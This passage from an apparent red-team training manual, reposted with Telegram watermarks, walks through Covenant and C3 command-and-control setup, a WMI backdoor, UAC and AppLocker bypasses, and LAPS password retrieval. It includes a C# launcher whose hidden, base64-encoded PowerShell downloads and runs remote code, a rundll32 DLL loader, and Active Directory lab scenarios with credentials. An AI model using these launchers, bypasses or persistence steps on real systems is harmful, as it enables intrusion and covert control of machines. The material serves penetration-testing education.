https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

-Force

Then, use the command PowerShellImport. Inside

theInteract menu.

You will be able to choose your file to be

executed on the remote machine. Apart from
persistence, any other task with custom
PowerShell can be executed this way.

WMI Backdoor
Note: this task is designed to be executed
locally, but you can try to perform it in the
lab.

An example of System-level persistence might be a

WMI Subscription.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

WMI backdoor is an advanced and very complex

technique. A whitepaper describing it has been
released and can be found at
https://www.fireeye.com/content/dam/fireeye-www/g
lobal/en/current-threats/pdfs/wp-windows-manageme
nt-instrumentation.pdf

and
https://www.blackhat.com/docs/us-15/materials/us-
15-Graeber-Abusing-Windows-Management-Instrumenta
tion-WMI-To-Build-A-Persistent%20Asynchronous-And
-Fileless-Backdoor-wp.pdf

WMI backdoor can be executed from the "tasks"

menu.

Connecting Covenant with C3 Framework

Note: this task should be executed on your local
machine.

C3 is (at least in the beginning of 2020) a

fairly new open-source framework which is
targeted to help Command and Control operators

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

establish covert channels to help keep the

agent-c2 communication secure.

For the time being, C3 by default offers

integration with Cobalt Strike and Covenant - of
course, custom C2 integration can be achieved
however this would require analyzing the source
code to create modules which can communicate with
it.

You can download the C3 framework from GitHub.

You can either go the hard way which includes
compilation (it might require you to have the
latest Visual Studio 2019) or download a
pre-built release.

We will use the ready release in order to show

you its capabilities in connecting with Covenant.

Note, that this exercise has to be set up

locally.

We will go to
https://github.com/FSecureLABS/C3/releases and
download the release. Then we simply unpack the
zip archive and navigate to the folder it
contains.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's open an administrative cmd console and

launch StartWebController.cmd. Then navigate to
localhost:52935

You will be displayed a window named Gateway

Setup. Name it as you wish and click download,
then unpack the zip archive you downloaded and
run the executable it contains.

Your screen should now look like below:

Before we proceed forward, let us first explain

what is the gateway and what else is required for
our setup. As already said, C3 is responsible for

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

creating reliable channels between implants and

C2, so the gateway is a node that will allow you
to connect both your channel C2 and the machine
you compromised. In C3 Framework's vocabulary
there are the following terms:

● Connector - a connection between Gateway and

the C2 Framework. By default, a connection
with Covenant and Cobalt Strike is supported.

● Gateway - a main node which allows to set up

other infrastructure around it

● Channel - a communication medium, by default

we can use Slack or UNCShare. Setting up a
Slack channel is not documented and requires
setting up a new Slack app which requires
some specific permissions. We will focus on
the UNCPath channel - which involves a
network share available for read and write
for both victim and the machine where your
gateway is set up.

● Relay - this is the payload of C3, however,

it does not allow you to execute any
commands. It simply ensures access to the
Channel and connection to Gateway.

First, a Gateway is required. Then, you need a

Channel, a Connector to the C2, and a Relay which

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

is started on the victim machine. Once Relay is

started, you can start to interact with it via
the C2 interface. Let's see how this set up can
be achieved. There's also one last thing that has
to be completed - a helper for Covenant connector
named C2Bridge. You can download it here:

https://github.com/cobbr/C2Bridge

You will need VisualStudio 2019 and .NET core 2.2

to compile it or, as you open the .sln file in
Visual Studio 2017 with .NET core 2.1, you need
to go to C2Bridge.csproj and change the to
netcoreapp2.1 as per the below screenshot.

Then, compile the file as Release and note down

the path where your result DLL is saved.

First, let's prepare a network share that will be

accessible from the victim. We created a c:\
folder accessible to group Everyone. Our machine
hostname is VICTIM.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, go to the control panel of C3 and set up a

new channel. Double click on gateway icon and
choose "Command Center". Choose the command
"AddChannelUncShareFile". We leave the two next
random values unchanged and enter the filesystem
path of our network share.

Next, the Send Command is clicked. The channel

should be now visible on the infrastructure map.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, let's double-click on the newly created

"Channel" icon. Once you point the cursor onto
"Interface options" a menu will drop down. Choose
"New relay". Note, that in Relay options, all the
channel parameters including share location are
already set up. You just need to change the relay
name if you want. We will name it victim-relay.

You should be now able to download the relay. It

is an agent launcher - before moving it into a
real victim system it should be obfuscated.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we run the relay on victim system the

infrastructure map is updated:

Now, let's connect Covenant to our

infrastructure. You might want to use it out of
Kali and not from docker - we simply set it up
using instructions present on its official page:

$ ~ > git clone --recurse-submodules

https://github.com/cobbr/Covenant

$ ~ > cd Covenant/Covenant

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

$ ~/Covenant/Covenant > dotnet build

$ ~/Covenant/Covenant > dotnet run

Next, we will add Covenant as our C2 for the

infrastructure. First, make sure that you have
network visibility of the covenant instance.
Then, double click the gateway and choose Command
center -> TurnOnConnectorCovenant.

After a while, you should be able to see a new

infra member as well as a new listener in the
Covenant panel. Also, we will launch the C2Bridge
using the command line:

dotnet C2Bridge.dll 192.168.139.214 8000 8000

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In the next step, double-click on the relay and

choose "Add Peripherial Grunt". We change connect
attemtps to 300 as well as change Pipe name to
something longer.

This might take up to 2-3 minutes to set up. Once

done, you will see a new infra member as well as
a new SMBGrunt on the Covenant panel.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

From that place, you can freely interact with the

target machine.

Hybrid binary-powershell launcher

Note, that this exercise is to be executed
locally, but you can try it as well in the lab
environment.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For basic persistence, you might want to create

an .exe out of your powershell launcher. Let's
try to compose a .NET assembly which will run a
powershell stager command.

First, open Visual Studio and choose New Project.

Choose Console App (.NET Framework)

Use the following code to create an assembly that

will launch the powershell stager:

//Program.cs

using System;

using System.Collections.Generic;

using System.Diagnostics;

using System.Linq;

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

using System.Text;

using System.Threading.Tasks;

namespace Service

class Program

public static void Main(string[] args) {

var gruntStartInfo = new

ProcessStartInfo{

FileName =

@"C:\Windows\System32\WindowsPowerShell\v1.0\powe
rshell.exe",
Arguments = @"powershell -Sta -Nop -Window Hidden
-EncodedCommand
aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAd
AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbw
BhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA
5ADIALgAxADYAOAAuADEA"

};

using (var grunt = new Process

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

StartInfo = gruntStartInfo

})

grunt.Start();

Of course, paste your launcher code into the

second argument. Compile with configuration
Release/Any CPU.

Move the Service.exe binary to your attacker

machine where you can start to interact with a
High Integrity grunt. We are uploading it to
user's location which is very likely to be
writable anyway -
c:\users\win10en\AppData\Local\Temp\Service.exe.
It can later be used as a local payload - for
persistence purposes.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Bypassing UAC
Note, that this exercise is to be executed
locally.

There is a great tool for bypassing UAC named

UACme.

https://github.com/hfiref0x/UACME

You can compile any executable from that suite

and try to transfer it to the remote OS. When
compiling the .sln file you might have to
manually change the Build Tools version in the
Project options. You can do it by right clicking
on each solution and changing version from "v142
- not installed" to older one, v141. Also note we
are compiling the project as x64.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will use the Akagi64.exe binary from the

suite. You can transfer it to a Victim machine
using any technique you like - for example the
Shell command at the Grunt menu.

After compilation, Akagi64.exe is renamed to

a.exe and uploaded to the target machine:

Moreover, a binary launcher is generated to be

launched with elevated permissions - this means,
we also need to upload it and then provide it as
an argument to Akagi64.exe (a.exe)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We saved our launcher as

c:\users\admin\binary.exe. Then we run it with
the "Shell" command task:

In that case method no 49 worked and we received

a High integrity grunt.

Windows Defenses
Note, that this technique cannot be executed
within the lab

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

One of the defenses built in into the Windows OS

is LAPS (Local Administrator Password Management
Solution). It provides rules for managing
passwords for local administrator across
computers in the domain. Using it, it is possible
to make sure that local admin accounts have
different and complex passwords which are also
automatically changed on a regular basis.

This prevents SAM abuses. LAPS has to be

installed to a target system in order to take
effect.

In order to deal with LAPS, you can use a tool

available on github:

https://github.com/PowerShell/GPRegistryPolicy

Using it, you are able to parse .pol GPO policy

files, which contain interesting information
about requirements for the passwords enforced by
LAPS.

When a computer executes a Group Policy update,

the first thing to be done is to check if the
password has been expired or not. If so, a new
random password is generated and set up, and then
it is stored in AD as an attribute to its own
computer object.

These attributes are

● ms-Mcs-AdmPwd

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● ms-Mcs-AdmPwdExpirationTime

These attributes can be read only by Domain

Admins group members. If you have sufficient
permission, you can try to retrieve these
passwords using powershell:

Get-AdmPwdPassword -ComputerName NAME | select

Password

You will be able to obtain the password in

clear-text.

This can also be achieved using PowerView:

PowerShell Get-DomainObject -Identity MACHINE

-Properties ms-Mcs-AdmPwd

Using Covenant in Applocker-enabled

environments
Note, that this exercise is preferred to be
executed locally

Applocker is a Windows' feature present on

systems since Windows 7. By default, it is turned
off.

In short, it allows to restrict executable

content that can be launched by a machine or
domain users. It can be set at the GPO or local
machine level.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Applocker applies these restrictions using rules

named policies. They can apply to several basic
kinds of files, that applocker can identify.
These are Executables (e.g. .com, .exe), Windows
installer files ((e.g. .msi, .msp, mst), Scripts
((e.g. .js, .vba, .vbs, .bat, .ps1), App
installers ((e.g. .appx), and DLL Files (e.g.
.dll)

To manage applocker, one has to possess

administrative rights over a machine / domain and
then go to computer (or domain) policies e.g.
using secpol.msc

We will focus on bypassing applocker policies on

a single machine level, but be aware that the
same logic applies for bypassing domain-level
applocker. The origin of restrictions is
different, but their effect is the same.

You do not need to follow the process presented

below, but if you want to experiment with
applocker you are free to do it on the UATSERVER
machine.

First thing we need to do is to start the

"AppIDSvc" service as well as set its start to
"automatic" so it will persist regardless of any
reboots.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we go back to the main console of secpol.msc,

we can expand the AppLocker list right-click on
"executable rules". Then, click "Add New Rule"

We choose "Deny" and in "Path" downloads are

restricted. The final rules are shown on the
below screenshot:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

These rules say that anyone can run files that

are Program Files or Windows directories - green
"allow" ones are rules created by default by
applocker.

They prevent you from locking yourself up when

setting up restrictive rules. Also, a default
rule that allows administrators to run anything
is deleted.

We can see that two "deny" rules disallow users

to run files in c:\users\appsvc\temp\* and in
Downloads\*.

At the end of the configuration, "Configure rule

enforcement" is chosen and all rules are set to
"Enforce rules" mode.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In such case, even if we are able to execute code

on the remote machine, we could have trouble
running any additional executables.

Say we already have a session with UATSERVER

which can be achieved e.g. via pivoting shown
previously or a SMB grunt.

In the case of a new environment, we are unable

to verify, what are exactly the restrictions.

Basically, applocker can often be bypassed by

finding a weak point or an exception in its
rules. Note that in an unknown environment we

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

could generate lots of alerts when trying to

execute something that applocker doesn't allow.

Luckily, we can utilize built-in powershell

cmdlets in order to enumerate the effective
applocker policy:

Get-ApplockerPolicy -Local

We can see that it was possible to retrieve the

current applocker policy

However, is it not readable in this format. But

it is possible to redirect the output to a file:

powershell Get-AppLockerPolicy -Effective -Xml |

Set-Content ('c:\windows\tracing\policy.xml')

The given cmdlet will retrieve the effective

applocker policy and store it in a file.

After using that command in the Interact tab, we

can try to Download that file:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As the task is completed, we can go to Data and

download the file.

At the end of the file, we can see that there is

an exception folder provided for running
executables.

In that case, downloading and moving a file to

the exception folder will allow its execution.

Other popular bypasses of applocker, apart from

changing execution directories, might involve
using legitimate windows executables that have a
code execution capability. There is a
community-supported project LOLBAS which is
focused on discovering such legitimate binaries
that might lead to executing other files.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://lolbas-project.github.io/

For example, such execution can be achieved with

using rundll32.exe to run another dll-formatted
payload. The LOLBAS project contains information
about dozens of similar binaries, so most likely
you will find a bypass candidate that is not
known by the sysadmin.

Bypassing applocker with DLL Launcher

In order to create a rundll32-runable grunt first
you need to generate a Binary launcher.

We use a HTTP Listener to which the target

machine will be allowed to connect to.

Next, we click "Generate" and then we go to

"Code"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will use that Grunt code to create a DLL grunt

loader.

Let's open Visual Studio and create new project

of type C# Library

Next, paste the Grunt code into ClassLibrary1.cs

You will need however to make some additions.

First, create a new class:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

public class Exports {

[DllExport("GruntEntry", CallingConvention =

CallingConvention.Cdecl)]

public static void GruntEntry(IntPtr hwnd,

IntPtr hinst, string

lpszCmdLine, int nCmdShow)

new GruntStager();

Now, you will need to add two new imports.

First, add

using System.Runtime.InteropServices;

Next, you will need to add a Nuget Package. Go to

Project Manage -> Nuget Packages and Browse for
UnmanagedExports

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Install the latest version. Add it to the class

by adding another import:

using RGiesecke.DllExport;

Then, go to Project Properties and change .NET

framework version to 4.

Also, click on "Any CPU". Configuration manager

will appear. Change "Any CPU" to x64.

You can now build the solution.

With a DLL prepared in such way, you can run it

using

rundll32 ClassLibrary1.dll,GruntEntry

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We transfer the DLL library to UATSERVER using

the Upload task. Regardless of the execution
restriction, a dll grunt can be run. We also need
to move it to the "Exception" directory which is
located on the disk C.

The grunt is activated from process

"rundll32.exe".

—-----------------------------------------------

—-----------------------------------------------

Red-teaming Active Directory Lab

#2 (ELS.BANK)
https://my.ine.com/CyberSecurity/courses/9328123b/penetration-testing-red
-teaming-active-directory/lab/4a30ae77-99ca-4726-8791-f79bb1729066

Scenario{.smallcaps}

In the following lab (created by our senior

instructor Slavi Parpulev), you can practice some

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

of the attacks against Active Directory

infrastructure that were explained in the
Penetration Testing eXtreme course.

You are engaged in a red teaming engagement. Your

goal is to find ways to stealthily escalate to
Domain Administrator (or similar privileges). The
environment has been configured with certain
restrictions and additional hardening has been
applied. Bear in mind that an Antivirus solution
is enforced in the environment, therefore either
ensure that your payloads are undetected before
attempting to execute them in the customer's
environment or disable it altogether.

The Scope of Engagement contains the following

subnets:

● 175.12.80.1/24 (Pentester VLAN)

● 172.16.80.1/24 (Accessible/exposed IP Range)

● 10.100.11.1/24 (Internal IP Range)

● 10.100.10.0/24 (Critical Infrastructure IP

Range)

For this lab, you begin in the Pentester VLAN,

however, your customer has provided you with
Remote Desktop access (RDP) to one of their
machines (workstation01 - 172.16.80.100) to

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

perform an assume-breach assessment. The provided

machine is a standard build for their
environment, and the credentials provided to you
are:

Username: els\analyst1

Password: P@ssw0rd123

NOTE: After each scenario, we recommend that the

environment is reset back to its original state
(Stop button, then Reset button).

Goals{.smallcaps}

Stealthily escalate your privileges to Domain

Administrator-level ones in the five (5) distinct
scenarios below, from a non-privileged domain
user.

Overall, learn, understand and exploit:

● Unconstrained delegation in Active Directory

● Constrained delegation in Active Directory

● Resource-Based delegation in Active Directory

● Common pitfalls and misconfigurations often

left behind by system administrators

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Active Directory objects' Access Control

Lists

● Escalation attacks through credentials

dumping and DCSync

● Shadow Principals in Active Directory

What you will learn{.smallcaps}

During the lab, you will learn how to enumerate

Active Directory to discover misconfigurations
and also abuse AD features often found in
real-world implementations. You will also learn
how to travers different network subnets and
exploit systems and services which may not be
directly routable by your machine.

To guide you during the lab you will find

different Tasks (referred to as Scenarios).

These tasks (scenarios) were set up for

educational purposes and to show you the usage of
different tools and different methods to achieve
the same goal.

If this is the first time you do this lab, we

advise you to follow these Tasks.

Once you have completed all the Tasks, you can

proceed to the end of this manual and check the
solutions

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Recommended tools{.smallcaps}

● Visual Studio

● [ProcDump] & mimikatz (for dumping lsass

process to a file and extracting
credentials/hashes offline)

● SharpHound

● Various tools from GhostPack

● RDP

● RoguePotato

● PrintSpoofer

Tasks{.smallcaps}
Task 1: Scenario 1 - ACL abuse{.smallcaps}

Identify an ACL-based escalation path to Domain

administrator starting as analyst1.

Task 2: Scenario 2 - Constrained Delegation{.smallcaps}

Perform AD reconnaissance and identify a way to

utilize constrained delegation to escalate your
privileges to Domain administrator, starting as
analyst1.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Hints:

● Passwords in files? It happens ...

● If you cannot impersonate a Domain

administrator, what else is there?

● Not all Secure strings are ... so secure.

Task 3: Scenario 3 - Resource-Based Delegation{.smallcaps}

Perform AD reconnaissance and identify a way to

utilize resource-based delegation to escalate
your privileges to Domain administrator, starting
as analyst1.

Hints:

● Passwords in attributes? It happens ...

● Object's owner has implicit full control of

the object

● ACL Path from scenario one can be useful here

Task 4: Scenario 4 - Unconstrained delegation{.smallcaps}

Perform AD reconnaissance and identify a way to

abuse Unconstrained delegation to escalate to
Domain administrator, starting as analyst1.

Hints:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Kerberos pre-authentication

● LAPS

● Printer bug

Task 5: Scenario 5 - Shadow Principals{.smallcaps}

Perform AD reconnaissance and identify a way to

abuse Shadow Principals from another forest to
gain access to "els.bank", starting as analyst1.

Hints:

● Server Side Include (IIS)

● Parameter Serialization

SOLUTIONS{.smallcaps}
Below, you can find solutions for each task.
Remember though that you can follow your own
strategy (which may be different from the one
explained in the following lab).

Task 1: Scenario 1 - ACL Abuse{.smallcaps}

Using basic enumeration we see that, except us,

there is another user who is logged onto the
machine:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's note that for now and continue with the

enumeration process. Proceed by using SharpUp
(from GhostPack) to enumerate the machine for
common escalation misconfigurations:

We can immediately spot that there is a service,

which we can modify. There are many different
directions to go from here. That being said,
we'll simply create our own service binary that
adds "Analyst1" to the local administrators'
group. The code used inside it is the following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Building the above, moving the binary to

"workstation01" and starting the service gives us
the following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We successfully added our user to the local

administrators' group. For additional
reconnaissance, we executed SharpHound to attempt
and identify ways to Domain Administrator. A

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

simple search in it displaying paths to Domain

administrator shows the following.

There is a path from user "Johnny". We also

identified earlier that "Johnny" is logged on to
"workstation01". Let's get back to this in a
second.

The natural next step is to identify any

hardening that is applied on the machine, the
most obvious way to do this is by inspecting
applied GPOs. To produce such output, we need to
run the command "gpresult -h gpos.html" in an
elevated prompt.

An important observation from the output at this

point, is that the local administrators group of
workstation01 is managed by a GPO, which deletes
all members except the pre-set ones. This means
that even though we managed to escalate, our user
will be removed from the group next time the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

